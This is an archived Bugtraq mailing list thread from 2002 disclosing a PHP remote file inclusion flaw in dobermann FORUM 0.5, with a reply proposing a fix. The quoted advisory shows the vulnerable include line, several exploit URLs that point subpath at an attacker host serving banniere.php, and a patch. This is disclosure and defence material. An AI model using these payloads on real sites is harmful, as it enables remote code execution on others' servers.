Home page logo
/

bugtraq logo Bugtraq mailing list archives

RE: dobermann FORUM (php)
From: "Mark Stunnenberg" <marksg () chello nl>
Date: Tue, 29 Oct 2002 10:00:22 +0100

Or place a:

--------------------
<? $subpath = ''; ?>
--------------------
Right above the place where the actual $subpath is being set.

Mark

-----Original Message-----
From: Frog Man [mailto:leseulfrog () hotmail com] 
Sent: zondag 27 oktober 2002 P 23:53
To: bugtraq () securityfocus com
Subject: dobermann FORUM (php)


Informations :
°°°°°°°°°°°°°°
Product : dobermann FORUM
version : 0.5
website : http://www.le-dobermann.com
Problem : Include file

PHP Code/location :
°°°°°°°°°°°°°°°°°°°
entete.php
enteteacceuil.php
topic/entete.php :
------------------------------------------
<?php @include $subpath."banniere.php"; ?>
------------------------------------------

index.php
newtopic.php :
------------------------
@require "config.php";
@include("entete.php");
------------------------

Exploits :
°°°°°°°°°° http://[target]/entete.php?subpath=http://[attacker]/
http://[target]/enteteacceuil.php?subpath=http://[attacker]/
http://[target]/topic/entete.php?subpath=http://[attacker]/
http://[target]/index.php?subpath=http://[attacker]/
http://[target]/newtopic.php?subpath=http://[attacker]/
with
http://[attacker]/banniere.php

Patch :
°°°°°°°
In files :
------------------
entete.php
enteteacceuil.php
topic/entete.php
------------------
replace the line :
------------------------------------------
<?php @include $subpath."banniere.php"; ?>
------------------------------------------
by :
------------------------------------------
<?php
$banfile=$subpath."banniere.php";
if (file_exists($banfile)){
@include $banfile; }
?>
------------------------------------------



More details in french : 
http://www.frog-> man.org/tutos/dobermannFORUM.txt
translated 
by Google : 
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-
man.org%2Ftutos%2FdobermannFORUM.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-
1&prev=%2Flanguage_tools


frog-m () n






_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! 
http://www.msn.fr/msger/default.asp



  By Date           By Thread  

Current thread:
  • dobermann FORUM (php) Frog Man (Oct 29)
    • <Possible follow-ups>
    • RE: dobermann FORUM (php) Mark Stunnenberg (Oct 29)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]